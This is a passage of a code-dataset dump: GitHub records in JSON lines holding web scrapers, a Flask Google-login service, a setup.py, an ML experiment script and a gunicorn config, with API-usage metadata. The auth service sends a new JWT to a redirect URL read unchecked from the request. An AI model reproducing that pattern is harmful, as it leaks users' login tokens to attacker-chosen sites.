"usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 504, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 506, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 512, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 516, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 521, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 523, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 531, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 532, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 537, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 537, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 538, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 542, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 542, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 547, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 547, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 552, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 552, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 557, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 557, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 561, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 561, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 562, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 565, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 567, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 575, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 579, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 584, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 586, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 594, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 595, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 600, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 600, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 601, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 605, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 605, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 610, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 610, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 615, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 615, "usage_type": "attribute"}, {"api_name": "streamlit.error", "line_number": 621, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 624, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 628, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 628, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 629, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 632, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 635, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 643, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 647, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 652, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 654, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 662, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 663, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 671, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 675, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 675, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 680, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 680, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 685, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 685, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 689, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 689, "usage_type": "attribute"}, {"api_name": "sklearn.svm.SVC", "line_number": 690, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 693, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 695, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 697, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 703, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 707, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 712, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 714, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 722, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 723, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 725, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 725, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 726, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 732, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 736, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 737, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 755, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.model_selection.learning_curve", "line_number": 758, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 763, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 764, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 764, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 765, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 765, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 768, "usage_type": "call"}]}
+{"seq_id": "29057862793", "text": "from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom splinter import Browser\nimport requests\n\n#define function to intiate \"light\" browser for nav\ndef init_browser():\n executable_path = {'executable_path':'chromedriver.exe'}\n browser = Browser('chrome',**executable_path, headless=False)\n\n return browser\n\n\n#define the scrape function\ndef scrape():\n\n #### Get news title and body ####\n\n # Get page HTML into a Soup\n browser = init_browser()\n url_to_scrape = \"https://redplanetscience.com/\"\n browser.visit(url_to_scrape)\n html = browser.html\n soup = bs(html,'html.parser')\n\n # Get all news items\n news_items = soup.find_all('div', class_='list_text')\n\n news_title = news_items[0].find('div', class_='content_title').text\n news_p = news_items[0].find('div', class_='article_teaser_body').text\n\n #### Get Featured Image ####\n\n # Get page HTML into a Soup\n url = \"https://spaceimages-mars.com/\"\n browser.visit(url)\n html = browser.html\n soup = bs(html,'html.parser')\n #assing source url to variable\n featured_image_url = soup.find_all('img', class_='headerimage fade-in')[0][\"src\"]\n\n #### Get Table ####\n\n # Get page HTML into a Soup\n url = \"https://galaxyfacts-mars.com/\"\n tables = pd.read_html(url)\n #scrape to pd.dataframe\n df2 = tables[1]\n #assign column headers\n df2.columns = [\"Mars\", \"Value\"]\n #convert to html\n mars_html_table = df2.to_html()\n\n #### Get Hemispheres ####\n\n # Get page HTML into a Soup\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n # Get all news items\n hemispheres = soup.find_all('div', class_='item')\n #create empty list to append dictionaries\n hemisphere_image_urls = []\n #loop through each iteration of hemispheres\n for hemisphere in hemispheres:\n\n hemisphere = hemisphere.find('div', class_=\"description\")\n #Get title\n title = hemisphere.h3.text\n #Assign sub-url for page nav\n link = hemisphere.a[\"href\"]\n #navigate\n browser.visit(url + link)\n # Get page HTML into a Soup\n html = browser.html\n soup = bs(html, 'html.parser')\n #Get image url\n image_link = soup.find('div', class_='downloads')\n image_url = image_link.find('li').a[\"href\"]\n #create dictionary to hold values\n image_dict = {}\n #add values\n image_dict['title'] = title\n image_dict['img_url'] = image_url\n #append to list\n hemisphere_image_urls.append(image_dict)\n #trim variable\n hemisphere_images = hemisphere_image_urls\n\n # Store data in dictionary\n mars_dict = {\n \"news_title\": news_title,\n \"news_p\": news_p,\n \"featured_image_url\": featured_image_url,\n \"table\": str(mars_html_table),\n \"hemisphere_images\": hemisphere_images\n }\n\n # Return results\n return mars_dict\n", "repo_name": "Squonk713/Web-Scraping-Challenge", "sub_path": "mars_scrape2.py", "file_name": "mars_scrape2.py", "file_ext": "py", "file_size_in_byte": 3019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "splinter.Browser", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "39135345334", "text": "from flask import url_for, request\nfrom flask_dance.contrib.google import google\nfrom flask_jwt_extended import JWTManager, create_access_token, get_jwt_identity\nfrom flask import session\nfrom os import getenv\nfrom extensions import db\nfrom models.user import User\nfrom models.candidate import Candidate\nfrom models.employer import Employer\nfrom models.job_post import JobPost\n\nclass AuthService:\n\t@staticmethod\n\tdef google_login():\n\t\t# Get `type` query param\n\t\tuser_type = request.args.get('type')\n\t\t# Save user type in session\n\t\tif user_type:\n\t\t\tsession['user_type'] = user_type\n\t\t# Return google login url\n\t\treturn url_for('google.login')\n\n\t@staticmethod\n\tdef google_login_callback():\n\t\ttry:\n\t\t\tif not google.authorized:\n\t\t\t\treturn url_for('google.login')\n\n\t\t\taccount_info = google.get('/oauth2/v2/userinfo')\n\t\t\tif account_info.ok:\n\t\t\t\taccount_info_json = account_info.json()\n\t\t\t\temail = account_info_json['email']\n\t\t\t\t# Check if user is in database\n\t\t\t\tuser = User.query.filter_by(email=email).first()\n\t\t\t\tif not user:\n\t\t\t\t\t# Create user \n\t\t\t\t\tname = account_info_json['name']\n\t\t\t\t\t# Split name into first and last name\n\t\t\t\t\tname_split = name.split(' ')\n\t\t\t\t\tfirst_name = name_split[0]\n\t\t\t\t\tlast_name = name_split[-1]\n\t\t\t\t\t# Get user type from session\n\t\t\t\t\tuser_type = session.get('user_type') or None\n\t\t\t\t\tif not user_type:\n\t\t\t\t\t\treturn {'error': 'User type not found'}\n\t\t\t\t\t\n\t\t\t\t\tif user_type == 'candidate':\n\t\t\t\t\t\tuser = Candidate(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telif user_type == 'employer':\n\t\t\t\t\t\tuser = Employer(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn {'error': 'Invalid user type'}\n\t\t\t\t\t# Add user to database\n\t\t\t\t\tdb.session.add(user)\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t# Create JWT token\n\t\t\t\taccess_token = create_access_token(identity=email)\n\t\t\t\t# Return url to frontend with JWT token\n\t\t\t\tredirect_url = request.args.get('redirect_url') or getenv('FRONTEND_URL')\n\t\t\t\treturn f'{redirect_url}?token={access_token}'\n\t\t\telse:\n\t\t\t\treturn {'error': 'Failed to fetch user info'}\n\t\texcept Exception as e:\n\t\t\treturn {'error': str(e)}\n\t\t\n\t@staticmethod\n\tdef user_data():\n\t\ttry:\n\t\t\tuser_email = get_jwt_identity()\n\t\t\tuser = User.query.filter_by(email=user_email).first()\n\t\t\tif user:\n\t\t\t\t# Get company_id from employer model if user is employer\n\t\t\t\tif user.type == 'employer':\n\t\t\t\t\temployer = Employer.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = employer.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\t# Add job posts to data\n\t\t\t\t\tjob_posts = JobPost.query.filter_by(employer_id=user.id).all()\n\t\t\t\t\tdata['job_posts'] = [job_post.serialize() for job_post in job_posts]\n\t\t\t\t\treturn data\n\t\t\t\telif user.type == 'candidate':\n\t\t\t\t\tcandidate = Candidate.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = candidate.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\treturn {'error': 'User not found'}\n\t\texcept Exception as e:\n\t\t\tprint('Error', e)\n\t\t\treturn {'error': str(e)}\n\n\t\t", "repo_name": "WaleedAhmed05/GoldenBullets-Soen6011summer2023", "sub_path": "backend/app/services/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.authorized", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 29, "usage_type": "name"}, {"api_name": "models.user.User.query.filter_by", "line_number": 34, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, {"api_name": "models.candidate.Candidate", "line_number": 48, "usage_type": "call"}, {"api_name": "models.employer.Employer", "line_number": 54, "usage_type": "call"}, {"api_name": "extensions.db.session.add", "line_number": 62, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 62, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 62, "usage_type": "name"}, {"api_name": "extensions.db.session.commit", "line_number": 63, "usage_type": "call"}, {"api_name": "extensions.db.session", "line_number": 63, "usage_type": "attribute"}, {"api_name": "extensions.db", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 67, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 77, "usage_type": "call"}, {"api_name": "models.user.User.query.filter_by", "line_number": 78, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 78, "usage_type": "name"}, {"api_name": "models.employer.Employer.query.filter_by", "line_number": 82, "usage_type": "call"}, {"api_name": "models.employer.Employer.query", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.employer.Employer", "line_number": 82, "usage_type": "name"}, {"api_name": "models.job_post.JobPost.query.filter_by", "line_number": 87, "usage_type": "call"}, {"api_name": "models.job_post.JobPost.query", "line_number": 87, "usage_type": "attribute"}, {"api_name": "models.job_post.JobPost", "line_number": 87, "usage_type": "name"}, {"api_name": "models.candidate.Candidate.query.filter_by", "line_number": 91, "usage_type": "call"}, {"api_name": "models.candidate.Candidate.query", "line_number": 91, "usage_type": "attribute"}, {"api_name": "models.candidate.Candidate", "line_number": 91, "usage_type": "name"}]}
+{"seq_id": "39749649765", "text": "import re\nimport setuptools\nimport subprocess\nimport sys\n\nif sys.version_info < (3, 5):\n sys.exit('Python 3.4 or older is not supported.')\n\n\ndef remove_flag3(x):\n return x[3:]\n\nldflags = subprocess.check_output([\"scorep-config\", \"--ldflags\"]).decode('utf-8')\ncflags = subprocess.check_output([\"scorep-config\", \"--cflags\"]).decode('utf-8')\n\nldflags = \" \" + ldflags\ncflags = \" \" + cflags\n\nscorep_include_dir = re.findall(\" -I[/+-@.\\w]*\", cflags)\nscorep_library_dir = re.findall(\" -L[/+-@.\\w]*\", ldflags)\n\nscorep_include_dir = list(map(remove_flag3, scorep_include_dir))[0]\nscorep_library_dir = list(map(remove_flag3, scorep_library_dir))[0]\n\nsetuptools.setup(name='scorep-cli-score',\n version='0.1',\n author='Marcel Achtert',\n author_email='marcel.achtert@tu-dresden.de',\n description='A Score-P-score based filter creation tool',\n url='https://github.com/score-p/scorep-score-gui',\n packages=['scorep_cli_score'],\n python_requires='~=3.5',\n scripts=['scorep_cli_score/scorep-cli-score'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: BSD License 2.0',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n ext_modules=[\n setuptools.Extension('bind',\n sources=['scorep_cli_score/bind.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n language='c++'),\n setuptools.Extension('scorep_profile',\n sources=['scorep_cli_score/scorep_profile.cpp'],\n include_dirs=[scorep_include_dir, '{}/cubelib'.format(scorep_include_dir)],\n library_dirs=[scorep_library_dir],\n libraries=['z', 'cube4', 'scorep_estimator'],\n extra_compile_args=['-std=c++14'],\n language='c++'),\n ])\n", "repo_name": "score-p/scorep_cli_score", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 7, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 13, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 25, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 45, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "7536964330", "text": "from collections import namedtuple\n\nimport GPy\n\nfrom gaussian_processes_variational.num_inducing_dimension_experiments import run_single_experiment\nfrom gaussian_processes_variational.parameter_containers import FixedParameterSettings\nfrom gaussian_processes_variational.simulation import RBFSimulator, LinearSimulator\n\n\ndef main():\n \"\"\"Run experiment for different datasets where a grid of number of inducings points and dimensions is explored.\"\"\"\n Experiment = namedtuple('Experiment', ['tag', 'simulator', 'kernel', 'dimensions', 'num_inducings'])\n n = 801\n inducing_points = [1, 2, 3, 4, 5, 10, 20, 50, 100, 200, 300, 400, n]\n dimensions = [1, 2, 3, 4, 5, 10, 15, 20]\n\n experiments = [\n # Experiment('rbf_fix_covariance', RBFSimulator, GPy.kern.RBF, dimensions, inducing_points),\n Experiment('linear_fix_covariance', LinearSimulator, GPy.kern.Linear, dimensions, inducing_points),\n ]\n opt_settings = FixedParameterSettings(fix_inducing_inputs=True)\n for experiment in experiments:\n run_single_experiment(experiment.tag, experiment.kernel, experiment.simulator, n, experiment.dimensions,\n experiment.num_inducings, opt_settings)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "DAlkemade/gaussian_processes_variational", "sub_path": "experiment_fix_inducing_inputs.py", "file_name": "experiment_fix_inducing_inputs.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.simulation.LinearSimulator", "line_number": 19, "usage_type": "argument"}, {"api_name": "GPy.kern", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gaussian_processes_variational.parameter_containers.FixedParameterSettings", "line_number": 21, "usage_type": "call"}, {"api_name": "gaussian_processes_variational.num_inducing_dimension_experiments.run_single_experiment", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "7988456665", "text": "access_logfile = '-'\nerror_logfile = '-'\ngraceful_timeout = 60\nlog_file = '-'\nlog_level = 'info'\nlogger_class = 'safe_transaction_service.history.utils.CustomGunicornLogger'\ntimeout = 60\nworker_class = 'gevent'\nworker_connections = 2000\n\n\ndef post_fork(server, worker):\n try:\n from psycogreen.gevent import patch_psycopg\n patch_psycopg()\n worker.log.info(\"Made Psycopg2 Green\")\n except ImportError:\n worker.log.info(\"Psycopg2 not patched\")\n", "repo_name": "bigman1208000/safe-transaction-service", "sub_path": "gunicorn.conf.py", "file_name": "gunicorn.conf.py", "file_ext": "py", "file_size_in_byte": 474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "psycogreen.gevent.patch_psycopg", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "72491990887", "text": "import os\nimport json\nimport datetime\nimport time\nimport argparse\n\nimport pytz\nfrom bs4 import BeautifulSoup\nfrom newspaper import Article\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\n\nparser = argparse.ArgumentParser(\n description='A web scraper for Buzzfeed articles.')\n\nrequiredNamed = parser.add_argument_group('required arguments')\nrequiredNamed.add_argument('-q', '--query', type=str, required=True,\n help=\"Query string\")\n\nparser.add_argument('-l', '--link_file', type=str, default=\"\",\n help=\"Path to a newline-delimited file of article links \"\n \"to scrape\")\nparser.add_argument('-r', '--date_range', type=str, default=\"\",\n help=\"A space separated string of dates of the form \"\n \"'mm/dd/yyyy mm/dd/yyyy'. If this argument is not \"\n \"supplied, the scraper will default to searching \"\n \"Buzzfeed's recently tagged articles.\")\n\nparser.add_argument('--sleep_time', type=int, default=5,\n help=\"Time (in seconds) to wait between queries\")\nparser.add_argument('--page_timeout', type=int, default=30,\n help=\"Time (in seconds) after which we stop trying to load \"\n \"a page and retry\")\n\ndef parse_args(parser):\n args = parser.parse_args()\n QUERY = args.query\n QUERY = QUERY.replace(' ', '+')\n\n SLEEP_TIME = args.sleep_time\n PAGE_LOAD_TIMEOUT = args.page_timeout\n\n LINKS_FROM_FILE = False\n if len(args.link_file) > 0:\n LINKS_FROM_FILE = args.link_file\n\n dr = args.date_range\n if len(dr) > 0:\n FROM_LAST = dr.split(' ')\n else:\n FROM_LAST = None\n return QUERY, SLEEP_TIME, PAGE_LOAD_TIMEOUT, LINKS_FROM_FILE, FROM_LAST\n\n\ndef render(query_url):\n browser = webdriver.PhantomJS()\n browser.set_window_size(1120, 550)\n\n browser.implicitly_wait(PAGE_LOAD_TIMEOUT)\n browser.set_page_load_timeout(PAGE_LOAD_TIMEOUT)\n\n try:\n browser.get(query_url)\n html_source = browser.page_source\n browser.quit()\n return html_source\n\n except TimeoutException:\n print(\"\\t\\tRetrying page load after {}s timeout\".format(PAGE_LOAD_TIMEOUT))\n return render(query_url)\n\n\ndef gen_query_url(page_num=1):\n base_url = \"https://www.buzzfeed.com/tag\"\n content = \"{}?p={}\".format(QUERY, page_num)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed(query_url):\n result = render(query_url)\n soup = BeautifulSoup(result)\n return soup\n\n\ndef get_article_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"article\")\n article_links = [hit.findAll(\"a\")[0].attrs['href'] for hit in hits]\n article_links = [base + link for link in article_links]\n return article_links\n\n\ndef get_archive_links(soup):\n base = \"https://www.buzzfeed.com\"\n hits = soup.findAll(\"ul\", class_=\"flow\")\n link_data = [(a.attrs['title'], a.contents[0], a.attrs['href']) for a in\n hits[0].findAll(\"a\")]\n\n links = []\n for lede, title, link in link_data:\n if QUERY.replace(\"+\", \" \").lower() in lede.lower():\n links.append(link)\n elif QUERY.replace(\"+\", \" \").lower() in title.lower():\n links.append(link)\n\n archive_links = [base + link for link in links]\n return archive_links\n\n\ndef date_range(start_date, end_date):\n for n in range(int((end_date - start_date).days) + 1):\n yield start_date + datetime.timedelta(n)\n\n\ndef gen_archive_url(yy, mm, dd):\n base_url = \"https://www.buzzfeed.com/archive/\"\n content = \"{}/{}/{}\".format(yy, mm, dd)\n query_url = os.path.join(base_url, content)\n return query_url\n\n\ndef search_buzzfeed_archive():\n from_month, from_day, from_year = [int(i) for i in FROM_LAST[0].split('/')]\n to_month, to_day, to_year = [int(i) for i in FROM_LAST[1].split('/')]\n\n start_date = datetime.date(from_year, from_month, from_day)\n end_date = datetime.date(to_year, to_month, to_day)\n\n dates = []\n for date in date_range(start_date, end_date):\n dates.append([int(i) for i in date.strftime(\"%Y-%m-%d\").split('-')])\n\n links = []\n links_fp = './links/buzzfeed_links_{}_{}-{}.txt'\\\n .format(QUERY,\n datetime.datetime.strftime(start_date, \"%m%d%y\"),\n datetime.datetime.strftime(end_date, \"%m%d%y\"))\n\n for year, month, day in dates:\n archive_url = gen_archive_url(year, month, day)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(archive_url)\n new_links = get_archive_links(soup)\n\n print(\"\\tFound {} article links for archive date {}\"\n .format(len(new_links), \"{}/{}/{}\".format(month, day, year)))\n links += new_links\n\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n return set(links)\n\n\ndef collect_links():\n links = []\n links_fp = './links/buzzfeed_links_{}.txt'.format(QUERY)\n\n if not os.path.exists(\"./links\"):\n os.makedirs(\"./links\")\n\n # if user passes a date range, we have to search the buzzfeed\n # archives rather than running a search query\n if isinstance(FROM_LAST, list):\n return search_buzzfeed_archive()\n\n prev_page_empty = False\n for idx in range(*PAGE_RANGE):\n query_url = gen_query_url(idx)\n\n time.sleep(SLEEP_TIME)\n soup = search_buzzfeed(query_url)\n new_links = get_article_links(soup)\n\n print(\"\\tFound {} article links on page {} of query results\"\n .format(len(new_links), idx))\n links += new_links\n\n # the most recent 2 pages are empty, we have run out of query pages!\n if len(new_links) == 0:\n if prev_page_empty:\n return set(links)\n else:\n prev_page_empty = True\n else:\n prev_page_empty = False\n with open(links_fp, 'a') as handle:\n handle.write('\\n'.join(new_links) + \"\\n\")\n\n return set(links)\n\n\ndef construct_article(link):\n article = {\"url\": link}\n\n article_obj = Article(url=link, language='en')\n article_obj.download()\n article_obj.parse()\n\n authors = article_obj.authors\n article['text'] = article_obj.text\n article['title'] = article_obj.title\n article['author'] = authors if len(authors) != 0 else None\n article['urlToImage'] = None\n article['description'] = article_obj.summary\n\n article['publishedAt'] = None\n article['before_election'] = None\n\n if article_obj.publish_date:\n date = tz.localize(article_obj.publish_date)\n article['publishedAt'] = date.isoformat()\n article['before_election'] = True if date < ELECTION_DATE else False\n return article\n\n\ndef scrape_articles():\n articles, links = [], []\n\n print('\\n####### Buzzfeed Scraper #######')\n print('Running query:')\n if not FROM_LAST:\n print('Scraping recent pages with the tag \"{}\"\\n'.format(QUERY))\n else:\n print('Scraping pages which contain \"{}\" from archives between '\n '{} and {}\\n'.format(QUERY, *args.date_range.split(' ')))\n\n if not LINKS_FROM_FILE:\n links = collect_links()\n else:\n with open(LINKS_FROM_FILE, 'r') as handle:\n for line in handle:\n links.append(line.strip())\n\n links = [i.strip() for i in set(links) if i.strip() != '']\n print('\\nCollected {} links'.format(len(links)))\n\n for idx, link in enumerate(links):\n print('\\t{}. Scraping {}'.format(idx + 1, link))\n time.sleep(SLEEP_TIME) # for throttling\n article = construct_article(link)\n articles.append(article)\n\n data = {'articles': articles,\n 'source': 'buzzfeed',\n 'status': \"ok\",\n 'query': 